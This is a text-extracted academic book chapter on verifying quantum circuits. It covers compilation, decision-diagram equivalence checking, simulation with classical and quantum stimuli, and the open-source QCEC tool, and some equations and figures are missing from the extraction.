Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Classical Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Quantum Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1421
Formal Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1423
Decision Diagrams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1424
General Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1425
Alternating Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1426
Designing a Strategy for Verifying Compilation Flow Results . . . . . . . . . . . . . . . . . . . . . 1427
Simulative Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1430
Verification Schemes Based on Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1431
Stimuli Generation Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1432
Resulting Quantum Circuit Equivalence Checking Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1436
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1438
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1438
R. Wille ()
Chair for Design Automation, Technical University of Munich, Munich, Germany
Software Competence Center Hagenberg GmbH (SCCH), Hagenberg im Mühlkreis, Austria
e-mail: [email protected]; [email protected]
L. Burgholzer
Institute for Integrated Circuits, Johannes Kepler University Linz, Linz, Austria
e-mail: [email protected]
Abstract
We are at the dawn of a new “computing age” in which quantum computers will
find their way into practical applications. Although quantum computers work
differently than classical machines, the design flow for realizing applications is
similar: first, the desired functionality/application is described on a high level.
Then, it is compiled down to a description (usually called quantum circuit) that
can be executed on an actual machine. During this process, lots of constraints
have to be fulfilled, and optimizations are applied to reduce the circuit’s size
and, hence, improve the actual performance on the quantum computer – all
of which are highly nontrivial steps. As in conventional design, sooner or
later, it is essential to check whether the resulting realization is correct –
motivating verification. This chapter reviews and provides a summary of work
in this regard. Considering the challenges currently seen in the verification
of (comparatively simpler) classical systems, this may provide the basis for
preventing the emergence of a verification gap in quantum computing.
Keywords
Introduction
(e.g., a sequence of dedicated microwave pulses applied to the qubits) that can
be executed on a real quantum computer (Amy et al. 2013; Barenco et al. 1995;
Maslov 2016; Giles and Selinger 2013; Zulehner and Wille 2018) – usually called
quantum circuit. Additionally, physical constraints of the target hardware have to
be taken into account, e.g., not all qubits may directly interact with each other and
different operations take different amounts of time (Zulehner et al. 2019d; Smith and
Thornton 2019; Wille et al. 2019; Li et al. 2019; Matsuo et al. 2019; Murali et al.
2019; Siraichi et al. 2018; Amy and Gheorghiu 2019; Zulehner and Wille 2019a;
Burgholzer et al. 2022a). Finally, several optimizations are applied to reduce the
circuit’s size and, hence, increase the expected fidelity when executing the circuit
on the actual quantum computer (Itoko et al. 2020; Vidal and Dawson 2004; Nam
et al. 2018; Hietala et al. 2019). These tasks are often referred to as compilation
(since eventually an “assembly program” results), synthesis (since quantum circuits
often serve as means of description), decomposition (since high-level operations are
broken down to elementary operations), or mapping (since qubits of the algorithms
are mapped to the physical qubits of the target architecture).
All these steps (in the following summarized as compilation) result in different
representations of the considered functionality, which significantly differ in their
basis operations and structure but are still supposed to be functionally equivalent.
Consequently, checking whether the original functionality is indeed maintained
throughout all these different abstractions becomes increasingly relevant in order
to guarantee a consistent and error-free design flow. This is similar in the classical
realm where, e.g., descriptions at the electronic system level, the register transfer
level, and the gate level exist. Here, these descriptions are verified using design
automation expertise leading to efficient methods for verification (more precisely,
for equivalence checking) in order to guarantee correctness throughout the design.
However, since quantum circuits additionally employ quantum-mechanical effects,
such as superposition and entanglement, those methods cannot be used for verifi-
cation in the quantum realm in an out-of-the-box fashion. Accordingly, how to do
verification for quantum circuits has to be approached from a different perspective.
At a first glance, these quantum characteristics make the problem of verification
harder – suddenly, circuits have to be supported which do not only rely on 0s and
1s but also on superposition or entanglement. And indeed, this task has been proven
to be QMA-complete (The class QMA is the natural extension of the classical class
NP to the quantum computing world (Bookatz 2013).) (Janzing et al. 2005). But, at
the same time, the inherent reversibility of quantum computations offers potential
not available in classical computing. More precisely:
• It allows for formal equivalence checking of two circuits by proving that the
composition of one circuit with the inverse of the other implements the identity –
a structure that can be represented very efficiently. If conducted in a clever
fashion, this efficient representation can be maintained throughout the entire
verification process. Eventually, alternating between applications of gates from
either circuit allows to conduct verification in an efficient fashion (under the
assumption that a suitable oracle can be derived).
1416 R. Wille and L. Burgholzer
This chapter sheds light into the challenges of quantum circuit verification but
also how characteristics such as those above can be utilized to tackle them. To
this end, section “Background” provides the necessary background to keep this
chapter self-contained. Then, section “Verification” formulates the problem of ver-
ifying quantum circuits. Afterward, sections “Formal Verification” and “Simulative
Verification”, respectively, describe the formal and simulation-based verification
techniques for quantum circuits that make use of the characteristics mentioned
above. Eventually, the composition of both techniques into the first advanced
equivalence checking flow is described in section “Resulting Quantum Circuit
Equivalence Checking Flow”. Implementations of all the methods provided in this
chapter are publicly available as open-source and can be accessed at github.com/
cda-tum/qcec. By this, the chapter provides the basis for preventing the emergence
of a verification gap in quantum computing as it is currently present for classical
circuits.
Background
This section briefly reviews the concepts of quantum computing and quantum circuit
compilation. For more detailed information, the interested reader is referred to the
provided references.
Quantum Computing
In quantum computing (Nielsen and Chuang 2010), the main computational unit
is the qubit. In contrast to classical bits, a single qubit q can be in an arbitrary
superposition of the basis states |0 and |1, i.e.:
n−1
|bn−1 ⊗ · · · ⊗ |b0 = |bn−1 . . . b0 = | bi 2i
i=0
40 Verification of Quantum Circuits 1417
In the circuit model of quantum computation, qubits are represented by wires and
are manipulated by quantum operations (quantum gates). Specifically, a quantum
circuit G with m gates, operating on n qubits, is denoted by G = g0 . . . gm−1 , where
each gi represents a quantum gate acting on (a subset of) n qubits. This is usually
visualized through quantum circuit diagrams, where the qubit wires are drawn as
horizontal lines, gates are drawn using a variety of symbols, and progression of
time is assumed to happen from left to right.
(denoted by •) are in state |1. In case there is only one control qubit, such a gate is
also called CNOT or controlled-NOT, while in case of two control qubits, it is also
called a Toffoli gate.
Initially, quantum algorithms are described in a way which is agnostic of the device
they are planned to be executed on. However, physical devices today impose several
constraints on the circuits to be executed. Thus, just as in classical computing, a
conceptual algorithm needs to be compiled to the targeted architecture. Compilation
of quantum circuits addresses three kinds of restrictions which limit the usability of
a quantum computer:
The first two, i.e., the limited gate-set and connectivity, constitute hard con-
straints – a computation not conforming to these restrictions may not be executed on
the device. In contrast, the short coherence time and limited gate fidelity represent
soft constraints – a quantum circuit may be executed on a device, but it is not
guaranteed to produce meaningful results if the circuit, e.g., is too large for the
state to stay coherent.
In order to tackle these limitations, first, the gates of the original quantum circuit
are synthesized to the gate-set supported by the targeted device. Most importantly,
since devices typically only support up to two-qubit gates, any gate acting on
more than two qubits is broken down into “elementary” gates. This process may
require the use of ancillary qubits for realizing the desired operation, e.g., for the
40 Verification of Quantum Circuits 1419
Example 2. Consider again the circuit G from Example 1 as shown in Fig. 1a. If this
circuit shall be executed on a system that only supports arbitrary single-qubit gates
and CNOTs, the Toffoli gate (the two-controlled NOT) first has to be decomposed
into this gate-set. One possible synthesized version is shown in Fig. 1b. It takes six
CNOTs, nine single qubit gates, and no additional ancillaries to realize the desired
gate.
Now, the circuit just contains elementary gates supported by the device, but it may
not yet conform to the device’s limited connectivity. Thus, the quantum circuit is
mapped to the target architecture, i.e., a mapping between the circuit’s logical
and the device’s physical qubits is established. Several heuristics for determining
a suitable initial mapping exist – from a trivial one-to-one mapping (qi → Qi ) to
explicitly considering calibration data and picking the most reliable set of qubits
for the computation (Murali et al. 2019). However, in most cases, it is not possible
to globally define a mapping which conforms to all connectivity limitations. As a
consequence, the logical-to-physical qubit mapping is usually changed dynamically
throughout the circuit. Typically, this is accomplished by inserting SWAP gates into
the circuit – effectively allowing to change the mapping of logical qubits to physical
qubits so that all operations can be executed while, at the same time, all connectivity
constraints are satisfied. Several approaches have been proposed for tackling this
immensely complex task (In fact, the mapping task has been shown to be NP-
complete (Siraichi et al. 2018).) (Zulehner et al. 2019d; Smith and Thornton 2019;
Wille et al. 2019; Li et al. 2019; Matsuo et al. 2019; Murali et al. 2019; Siraichi
et al. 2018; Amy and Gheorghiu 2019; Zulehner and Wille 2019a; Burgholzer et al.
2022a).
Example 3. Consider again the circuit G from Example 1, and assume that the
Toffoli gate has been synthesized as shown in Fig. 1b. Further, assume that the
circuit is to be executed on the IBMQ London architecture shown in Fig. 1c. Then,
Fig. 1d shows one possible circuit G̃ resulting from this mapping process. The
physical qubits Q0 , Q1 , and Q2 were chosen and initially assigned logical qubits q0 ,
q2 , and q1 , respectively. Just one SWAP operation applied to Q0 and Q1 (indicated
by ×) was added in the middle of the circuit in order to conform to the target’s
connectivity constraints (A SWAP operation is eventually realized using three CNOT
operations as indicated in the middle of Fig. 1.).
After this step of the compilation flow, circuits are ready to be executed
on the targeted devices. However, the previous steps significantly increased the
size of these circuits – impacting the achievable performance due to the limited
coherence time and gate fidelity. Thus, several optimizations may be employed
to reduce the circuit’s size and, hence, improve the actual performance on the
1420 R. Wille and L. Burgholzer
quantum computer. This might include fusing consecutive gates acting on the same
qubits, cancelling adjacent gates that are inverse to another (e.g., two consecutive
CNOT operations with the same control and target qubits), or more sophisticated
optimization techniques such as gate transformation and commutation (Itoko et al.
2020) or resynthesis of two-qubit unitary blocks (Vidal and Dawson 2004).
Example 4. Consider again the circuit G̃ from Example 3 shown in Fig. 1d that
has been mapped to the IBMQ London architecture. Applying one-qubit fusion and
adjacent-gate cancellation eventually allows to eliminate nine single-qubit gates and
results in the optimized circuit G shown in Fig. 1e.
Verification
Classical Circuits
– Formal verification (Biere and Kunz 2002; Drechsler 2004), which considers the
problem mathematically and proves that a circuit is correct with 100% certainty
– Simulation-based verification (Yuan et al. 2006; Bergeron 2006; Kitchen and
Kuehlmann 2007; Wille et al. 2009; Le et al. 2019; Laeufer et al. 2018), in
which certain input assignments (stimuli) are explicitly assigned to the circuit
and propagated through it and the outputs are compared to the expected values
Obviously, formal verification provides the best solution with respect to quality.
The corresponding methods are capable of efficiently traversing large parts of the
search space, e.g., by applying clever implications during the proof. The correspond-
ing techniques are, however, rather complex compared to their simulation-based
40 Verification of Quantum Circuits 1421
counterparts and, particularly for larger designs, often fail due to the exponential
complexity of the task.
Simulation is much easier to implement and very fast as long as only a limited
number of stimuli is applied. The problem obviously is the quality provided by
the applied set of stimuli. An exhaustive set of stimuli would show correctness
with 100% certainty but is practically intractable as this would eventually require
an exponential number of stimuli to simulate. Accordingly, methods such as
constraint-based random simulation (Yuan et al. 2006; Bergeron 2006; Kitchen
and Kuehlmann 2007; Wille et al. 2009), fuzzing (Le et al. 2019; Laeufer et al.
2018), etc. are key techniques to cope with this problem, while still maintaining
a high quality. Here, stimuli and/or data inputs are specifically generated (e.g.,
from constraints, mutations of randomly generated inputs, etc.) so that corner case
scenarios and/or a broad variety of cases are triggered. In doing so, errors that might
otherwise remain undetected are more likely to be found.
However, despite substantial progress that has been made in the past, e.g.,
on improving the efficiency of formal methods or on stimuli generation which
increases the coverage of simulative verification, verifying classical circuits remains
a challenge and, hence, is subject of further research.
Quantum Circuits
In the quantum realm, the verification problem can be stated in a similar fashion
as for classical circuits: given a circuit G, which acts as a specification (potentially
consisting of high-level operations or building blocks), and a quantum circuit G ,
which acts as an implementation, it shall be checked whether the implementation
adheres to the specification (Note that the terms device under verification and
golden specification are not established in the quantum realm (yet), which is
why, in the following, two quantum circuits G and G are considered that act as
specification and implementation.). More specifically, given two quantum circuits
G = g0 . . . g|G|−1 and G = g0 . . . g|G
|−1 with corresponding system matrices U
and U , the equivalence checking problem for quantum circuits asks whether:
Example 5. Consider again the circuits G and G shown in Fig. 1a and e, respec-
tively. Then, after accounting for the initial layout and the output permutation of
1422 R. Wille and L. Burgholzer
−1 0 0 0 1
2
1
2
1
2 − 12
If U and U differ in any column i (by more than a global phase factor eiθ ),
then the corresponding circuits G and G are not equivalent, and |i serves as a
counterexample showing that:
Here, the fidelity F between two states |x and |y is typically used as a similarity
measure for comparing quantum states, where F is calculated as the squared overlap
between the states, i.e., F = | x y|2 ∈ [0, 1]. Two states are considered equivalent
if the fidelity between them is 1 (up to a given tolerance ε).
Since U and Ũ are obviously not identical anymore, the circuits G and G̃
have been shown to be nonequivalent. Moreover, since U and Ũ differ in all of
their columns, any computational basis state |i serves as a counterexample, i.e.,
40 Verification of Quantum Circuits 1423
F(U |i , Ũ |i) < 1 for all i from 0 to 2n − 1. This characteristic of quantum
computing that even small errors frequently affect most (if not all) of a circuit’s
functionality will be further explored later in section “Simulative Verification”.
Formal Verification
Decision Diagrams
For our purposes, a decision diagram is a directed, acyclic graph with complex
edge weights. Consider a unitary matrix U ∈ C2 ×2 . Then, U can be split into four
n n
2n−1 ×2n−1 -sized sub-matrices Uij as shown on the left side of Fig. 2. This splitting
corresponds to the action of U depending on the value of the topmost qubit qn−1 ,
i.e., Uij describes how the rest of the system is transformed given that qn−1 is
mapped from |j to |i for i, j ∈ {0, 1}. In the corresponding decision diagram, this
manifests as a node with label n − 1 and four successor nodes as shown on the right
side of Fig. 2.
This decomposition scheme can now be applied recursively until only single
matrix entries (i.e., complex numbers) remain. The resulting structure has n levels
of nodes, labeled n − 1 down to 0. Sub-matrices only differing by a constant factor
can be represented by the same node in the decision diagram. In general, this is
handled by employing normalization schemes that guarantee canonicity and using
hash tables to track unique nodes. The corresponding common factors are stored
as edge weights in the diagram. In this fashion, rather compact representations for
many functional descriptions of quantum algorithms can be obtained.
Example 7. Consider again the circuit G shown in Fig. 1a and its corresponding
unitary matrix U shown in Example 5. Then, Fig. 3 shows the corresponding
decision diagram. To this end, the decision diagram visualization method proposed
in Wille et al. (2021) is adopted, where thickness and color of an edge represent the
edge weight’s magnitude and phase, respectively. Obviously, the decision diagram
representation is much more compact than the whole matrix.
with Uij() ∈ C2 ×2
n−1 n−1
for i, j ∈ {0, 1}. In the respective decision diagrams, Uij
and Uij directly correspond to the successors of a node. As a consequence, the
complexity of the multiplication scales with the product of the respective number of
nodes.
General Approach
Decision diagrams are predestined for verification, because they are canonical (with
respect to a particular variable order and normalization criterion), i.e., there are
no two different decision diagrams for the same functionality. Once the decision
diagrams for both circuits G and G in question are constructed, e.g., using the
techniques proposed in Burgholzer et al. (2021a), it suffices to compare their root
pointers and the corresponding top edge weight (Niemann et al. 2016).
two matrices (and, hence, decision diagrams). Let tr denote the trace of a matrix,
i.e., the sum of its diagonal elements. Then, because tr(I ) = 2n for the identity
transformation on n qubits, one can check whether | tr(U U −1 )| ≈ 2n in order
to conclude the equivalence of both circuits up to a given tolerance. This requires
further, potentially expensive, operations.
Furthermore, while decision diagrams frequently allow to compactly represent
the functionality of a quantum circuit, their worst-case complexity is still expo-
nential. Hence, it might not be possible to efficiently construct a representation of
a circuit’s full functionality. But, as mentioned above, characteristics of quantum
computing, specifically its inherent reversibility, offer promising potential for a
complementary approach. This is covered next.
Alternating Approach
If G and G are equivalent, then it holds that G−1 G = I , i.e., concatenating one
circuit with the inverse of the other implements the identity. Since the identity has a
perfectly compact representation as a decision diagram, being linear in the number
of qubits (as shown in Fig. 4), the decision diagram for the combined circuit G−1 G
can be constructed instead of constructing the individual circuits’ decision diagrams.
More specifically, this entails the computation of the following:
However, building up the decision diagram of G−1 G sequentially from left to right
might still result in an exponentially large decision diagram, since eventually the
whole decision diagram for G is constructed in the middle of the computation.
Hence, the much better solution (proposed in Burgholzer and Wille 2020a) is to
start constructing the functionality of the combined circuit “from the middle” and
alternate between applications of gates from G (“from the left”) and inverted gates
from G (“from the right”), i.e.:
−1 −1
I = G−1 · G = (gm −1 . . . g0 ) · (g0 . . . gm−1 )
Example 10. Assume, without loss of generality, that m ≤ m , i.e., G has at least
as many gates as G. Further assume an oracle ω : G → (G )∗ exists that, given
a gate gi ∈ G, returns a consecutive sequence of gates gk . . . gl ∈ G such that
gi ≡ gk . . . gl . Then, subsequently applying one gate g ∈ G and |ω(g)| inverted
gates from G constitutes a “perfect” strategy – yielding the identity after each pair
of applications. As a result, only matrices representing, or staying close to, the
identity occur. Since these can usually be represented very efficiently using, e.g.,
decision diagrams, the process of equivalence checking is substantially improved.
An easily accessible online tool (based on Wille et al. 2021), where the execution of
gates “from the left” or “from the right” can be nicely explored, is available at iic.
jku.at/eda/research/quantum_dd/tool/.
For the first issue, it can be exploited that the actual decomposition scheme, i.e.,
into how many elementary gates each of the original circuit’s gates is decomposed,
is known a priori. Thus, an oracle ω(·) which, given a gate g ∈ G, returns the
corresponding sequence of gates gk . . . gl ∈ G is explicitly known in this case.
Assuming that G resulted from the synthesis of a given quantum circuit G, applying
one gate from G and |ω(g)| inverted gates from G constitutes an optimal strategy
for conducting G I G – yielding the identity after each step.
Example 11. Consider the original circuit G shown in Fig. 1a. As indicated by
Fig. 1b, the Toffoli gate of G needs to be decomposed into elementary gates
supported by the architecture, while all other gates of G are already supported.
Thus, |ω(g)| = 1 holds for all g ∈ G except for the Toffoli gate, where |ω(g)| =
15 holds.
In case both circuits do not operate on the same number of qubits, the cor-
responding unitaries have different dimensions and cannot be applied directly.
Unfortunately, it is not sufficient to match the qubit count of G by just augmenting
the original circuit with idle qubits. Since ancillary qubits are always initialized
in a particular state (typically |0), this leaves some degree of freedom in the
overall unitary representation U . In order to compensate for this degree of freedom,
the eventually resulting matrix U has to be modified as shown in the following
example.
Example 12. Consider a unitary 2n × 2n matrix U , and assume that, w.l.o.g., the
last qubit qn−1 acts as an ancillary qubit initialized to |0. In general, the action of U
depending on the state of qn−1 is described by the four 2n−1 ×2n−1 sub-matrices Uij
as illustrated in Fig. 5a. Since the ancillary is initialized to |0, the sub-matrices
corresponding to the transformation from |1 can be ignored – resulting in the
modified matrix Ũ shown in Fig. 5b.
Fig. 5 Handling of ancillary qubits. (a) Original matrix U . (b) Modified matrix Ũ
40 Verification of Quantum Circuits 1429
Example 13. Consider the original circuit G and the mapped circuit G̃ shown in
Fig. 1a and d, respectively. While the X gate at the beginning of G is applied to the
logical qubit q2 , it is applied to the physical qubit Q1 in the circuit G̃. In order to fix
this mismatch, the qubit map m(·) – mapping Q0 → q0 , Q1 → q2 , and Q2 → q1 –
is employed. Consequently, the X gate of G̃ is applied to m(Q1 ) = q2 which now
matches the original gate from G perfectly.
Example 14. Consider again the scenario of Example 13. If the G I G scheme
is carried out using the qubit map m(·) defined there, the result would not represent
the identity. That is, because the logical-to-physical qubit mapping is changed in
the middle of G̃ by a SWAP operation applied to Q0 and Q1 . Thus, at that specific
point, the qubit map m(·) has to be updated accordingly, i.e., it then has to map
Q0 → q2 , Q1 → q0 , and Q2 → q1 . Through this dynamic change, the computation
of G I G remains close to the identity and, eventually, proves the equivalence
of both circuits.
Example 15. Consider again the circuit G̃ shown in Fig. 1d. There, the gray box
indicates the gates of G̃ realizing the Toffoli gate of the original circuit G shown in
Fig. 1a. The middle qubit thereby contains a T gate, which is directly followed by
an H gate. Accordingly, in the optimized circuit shown in Fig. 1e, these have been
merged into a single U2 (0, 5π4 ) gate. Thus, |ω(g)| = 15 does no longer hold but has
to be modified to |ω(g)| = 14 instead in case of the Toffoli gate (see Example 11).
Example 16. Consider again the circuit G̃ shown in Fig. 1d and its optimized
variant G shown in Fig. 1e. Then, the cancellation of the two consecutive H gates
in the beginning of G̃ cannot be anticipated through a straightforward adaptation
of ω(·). However, ω(·) remains a suitable approximation for staying close to the
identity.
Simulative Verification
If simulating both circuits with the same input yields different outputs, the circuits
have been shown to be nonequivalent. This constitutes an exponentially easier
task than constructing the entire system matrices U and U – although the
complexity of simulation still remains exponential with respect to the number of
qubits. Accordingly, verification based on simulations of the circuits in question
might provide a promising alternative. In fact, this has already been considered
in theoretical quantum information, where (truly quantum-based) methods have
been proposed (see e.g., Watrous 2018, Section 3 and Khatri et al. 2019). But
these approaches would require an execution on actual quantum computing devices,
whose availability and accessibility still are severely restricted. Hence, before
valuable quantum computing resources are wasted to verify a quantum circuit,
efficient alternatives which can be employed prior to an actual execution on a
quantum computer (using classical computing devices) are of high interest (This
has similarities to the verification of classical circuits which also shall be conducted
prior to an actual execution in the field.).
Such a quantum circuit verification scheme based on simulation can, in general,
be described as follows:
5. If F(|ϕG , |ϕG ) = 1, the stimulus |ϕ shows the incorrect behavior of G with
respect to G. Accordingly, the verification failed and the process is terminated.
6. Remove |ϕ from S.
7. If |S| = ∅ (i.e., S is still non-empty), continue with Step (2); otherwise, the
verification process has been completed.
Now, the challenges of such an approach are as follows: First, simulating a quan-
tum circuit G = g0 . . . g|G|−1 starting with an initial state |ϕ on a classical device
(Step (3) from above) is substantially harder than for the verification of classical
1432 R. Wille and L. Burgholzer
circuits (here, a single simulation yields only linear complexity). However, rather
powerful methods have been proposed to tackle this complexity – including methods
based on highly optimized and parallel matrix computations (Guerreschi et al. 2020;
Jones et al. 2018; Doi et al. 2019), tensor networks (Villalonga et al. 2019; Pednault
et al. 2019; Vincent et al. 2021; Brennan et al. 2021), quasiprobability/stabilizer-
rank methods (Seddon et al. 2020, and references therein), as well as decision
diagrams (Zulehner and Wille 2019b,c; Burgholzer et al. 2021c, 2022b).
Second, as in the verification of classical circuits, the quality of the verification
process heavily depends on the applied set of stimuli, i.e., 100% certainty cannot be
guaranteed as long as the set of applied stimuli is not exhaustive. Moreover, while
the stimuli space for classical circuits is finite (each input bit can be assigned either
0 or 1 – yielding a total of 2n possible stimuli), the state space in the quantum realm
is infinitely large (possible stimuli are elements of a 2n -dimensional Hilbert space).
Although the perspective of a possible infinite number of stimuli may seem rather
grim at a first glance, there are promising ways to check the correctness of quantum
circuits using simulative verification. These, however, severely depend on how the
stimuli are actually generated. In fact, high error detection rates can be achieved
even if only a few randomly chosen stimuli are considered – as long as these are
generated in a specific fashion. Corresponding schemes offering a trade-off between
expressiveness and efficiency are covered next.
In the following, different schemes for the generation of (random) stimuli are
illustrated, and it is explored how well they can show the correctness of a quantum
circuit.
The most straightforward application of simulative verification for quantum
circuits is to consider the set of computational basis states as stimuli (i.e., picking
|ϕ from the set {|i : i ∈ {0, 1}n }) and computing F(U |i , U |i).
Example 17. Consider an n-qubit quantum circuit G, and assume that some error
affects (w.l.o.g.) the first qubit in the actual realization G . In the quantum realm,
this means that the circuit G is described by the unitary matrix:
U = (I⊗(n−1) ⊗ E) · U,
where E describes an error gate that is applied to the first qubit. Due to the inherent
reversibility of quantum gates, this error has a localized effect on the output, i.e.:
However, this approach has a severe handicap – namely, that it is not faithful.
Specifically, for each quantum circuit G, there is an (infinitely large) family of
realizations G for which F(U |c , U |c) = 1 holds for all classical stimuli |c,
even if quantum states |ϕ with F(U |ϕ , U |ϕ) = 1 actually exist. An example
illustrates the problem:
Example 18. Consider the same scenario as in Example 17, but assume that the
error is characterized as E = Z, i.e., a phase flip error occurred. No classical
stimulus |c may detect such an error due to the fact that F(U |c, U |c) =
| c0 |Z|c0 |2 = 1 independent of |c. Intuitively, this happens whenever the
“difference” of U and U is diagonal in the computational basis, such as I⊗(n−1) ⊗Z
in case of this example.
Nevertheless, it has been shown that whenever classical stimuli are actually
capable of detecting a certain error in the realization G , they do so within
remarkably few simulations with randomly picked classical stimuli – an effect
contradictory to classical intuition.
The fact that classical stimuli generation is not sufficient to faithfully detect
errors in quantum circuits should not come as a surprise. After all, quantum circuits
are designed to achieve tasks that classical circuits cannot. In fact, a closer look at
the single-(qu)bit case already reveals a fundamental discrepancy: classical single-
bit operations map one of two possible inputs (0 or 1) to one of two possible
outputs (0 or 1). In contrast, the quantum case is much more expressive: the set
of all possible single-qubit states |ϕ is infinitely large and can be parametrized by
the two-dimensional Bloch sphere (Nielsen and Chuang 2010) illustrated in Fig. 6.
Single-qubit quantum operations map single-qubit states to single-qubit states.
Geometrically, this family encompasses all possible rotations of the Bloch sphere
as well as all reflections. Classical (single-qubit) stimuli, i.e., the states |0 and |1,
are not expressive enough to reliably probe such a continuum of operations. They
correspond to antipodal points on the (Bloch) sphere, and it is simply impossible
to detect certain transformations by tracking the movement of only two antipodal
points.
In order to address this, also stimuli beyond (classical) basis states should be
considered. More precisely, three pairs of antipodal points are sufficient for full
resolution (Schwinger 1960; Klappenecker and Rotteler 2005; Kueng and Gross
2015), namely:
|l = |ln−1 ⊗ · · · ⊗ |l0 with |li ∈ {|0 , |1 , |+ , |− , |↑ , |↓}
Example 19. Let us revisit the scenario from Example 17 (and Example 18). Com-
pared to classical stimuli, local quantum stimuli behave in a more homogeneous
fashion on the classical extreme cases shown before: first, suppose that E = X (bit
flip error). Then:
Compared to classical stimuli, only 2/3 of all local quantum stimuli detect this type
of error. Now, suppose that E = Z (phase flip error). Then:
Consequently, in contrast to not detecting such an error with classical stimuli at all,
again 2/3 of all local quantum stimuli are capable of detecting this type of error.
This observation that local quantum stimuli can detect errors which would
have remained undetected using classical stimuli is not a coincidence. In fact,
the collection of a total of 6n local quantum stimuli is expressive enough to
40 Verification of Quantum Circuits 1435
detect any error in a quantum circuit. The key idea is to relate the expected
fidelity E|l F(U |l , U |l) – where the average is taken over all 6n locally random
stimuli – to a meaningful distance measure in the space of unitary matrices.
This average outcome fidelity equals 1 if and only if U and U are function-
ally equivalent. Now, suppose that U and U are functionally distinct unitaries.
Then, E|l F(U |l , U |l) < 1 which is only possible if (at least) one stimulus
|l produces an outcome fidelity that is strictly smaller than one. While this rigorous
statement asserts that any error can be detected by (at least) one local quantum
stimulus, it does not provide any advice on how to find the “right” stimulus. This is
a very challenging problem in general, but the above example suggests that repeated
random sampling of stimuli should “do the job.” Typically, few randomly generated
local quantum stimuli suffice to detect realistic errors.
As demonstrated above, a modest increase in the expressiveness of stimuli can
already make a large difference. Local quantum stimuli can detect any error, while
classical stimuli cannot. This is interesting, because local quantum stimuli are
comparatively few in number (6n states in a 2n -dimensional state space to detect
arbitrary discrepancies in unitary circuits) and actually do not inherit many further
quantum features. For example, “global” quantum features such as entanglement
are not employed by them at all. This begs the question: what kind of advantages
can even more expressive and “more quantum” stimuli offer? Faithfulness is
not a problem anymore, but richer, global stimuli may help to detect errors
earlier, i.e., after substantially fewer iterations.
In order to identify powerful global quantum stimuli, it is helpful to revisit local
quantum stimuli from a different perspective: they are generated through starting
with a very simple classical state (i.e., |0 . . . 0) and applying certain single-qubit
gates to the individual qubits, e.g., |0 ⊗ |+ ⊗ |↑ = (I ⊗ H ⊗ H S) |000. Con-
sequently, random local stimuli are generated by choosing this layer of single-qubit
gates at random. This generation scheme can be readily generalized. Rather than
selecting only a single layer of (single-qubit) gates, a generation circuit G0 · · · Gl−1
is constructed that has l > 1 layers and, most importantly, also features two-
qubit gates. That is, a stimulus |g with |g = (G0 · · · Gl−1 ) |0 . . . 0 is generated,
where each Gi is a (single) layer comprised of the so-called Clifford gates (H , S,
CNOT) (Gottesman 1997).
Overall, this set of global quantum stimuli |g contains all local quantum stimuli
but is much richer and much more expressive. For instance, the overwhelming
majority of global quantum stimuli will be highly entangled. Provided that the
number of layers l is proportional to the number of qubits n (Hunter-Jones 2019;
Brandão et al. 2016), these stimuli show remarkable properties. Most notably, the
expected outcome fidelity (averaged over all possible global quantum stimuli |g)
accurately approximates one of the most prominent distance measures for n-qubit
quantum circuits, namely:
E|g F(U |g, U |g) ≈ Favg (U, U ) = 1 + 2n tr(U † U )
1 2
2n +1 .
1436 R. Wille and L. Burgholzer
Example 20. Consider again the scenario from Example 17 (and Example 18): a
single-qubit error E occurred on the first qubit leading to the unitary:
U = (I⊗(n−1) ⊗ E) · U,
where the single-qubit error is either E = X (bit flip error) or E = Z (phase flip
error). Then, Favg (U, U ) = 2n1+1 ≤ 2−n (because Pauli matrices are traceless)
which implies that it is very unlikely to not detect this error with a single, random
global quantum stimulus.
Eventually, this section (based on Burgholzer and Wille 2021a) describes how the
individual ideas presented in the previous sections can be composed to form the
first advanced equivalence checking flow for quantum circuits. Both techniques,
formal and simulative verification, complement each other in many different ways.
Trying to keep G I G close to the identity proves very efficient in case
two circuits are indeed equivalent – provided a “good” strategy can be employed.
Conducting simulations with appropriately chosen stimuli on the other hand allows
to quickly detect nonequivalence even in cases where both circuits only differ
slightly. Combining both ideas naturally leads to an equivalence checking flow as
illustrated in Fig. 7. Here, a limited number of r 2n simulation runs with stimuli
chosen according to some generation scheme (e.g., random computational basis
states) are started in parallel with the G I G equivalence checking routine
according to some strategy (e.g., a strategy tailored toward verifying compilation
flow results). Should any of these simulations (with stimulus |ϕi ) yield different
outputs in both circuits (i.e., a fidelity F(G |ϕi , G |ϕi ) = 1) or should the
equivalence checking routine be able to determine a final result not resembling the
identity, the nonequivalence of the circuits under consideration has been shown, and
all other executions can be aborted. On the other hand, the equivalence checking
routine either manages to establish whether both circuits are equivalent or, in case
it times out, leaves an indication (although no proof) that the circuits are likely
40 Verification of Quantum Circuits 1437
to be equivalent, due to the fact that even small errors frequently affect the entire
functionality.
The methodology described above is available as an open-source software
package called QCEC (Burgholzer and Wille 2021b) which is part of the Munich
Quantum Toolkit (MQT, formerly known as JKQ (Wille et al. 2020)) and available
at github.com/cda-tum/qcec. It is mainly developed in C++, runs under any major
operating system, and also provides Python bindings (including native integration
with IBM Qiskit) in order to be as accessible as possible to its community.
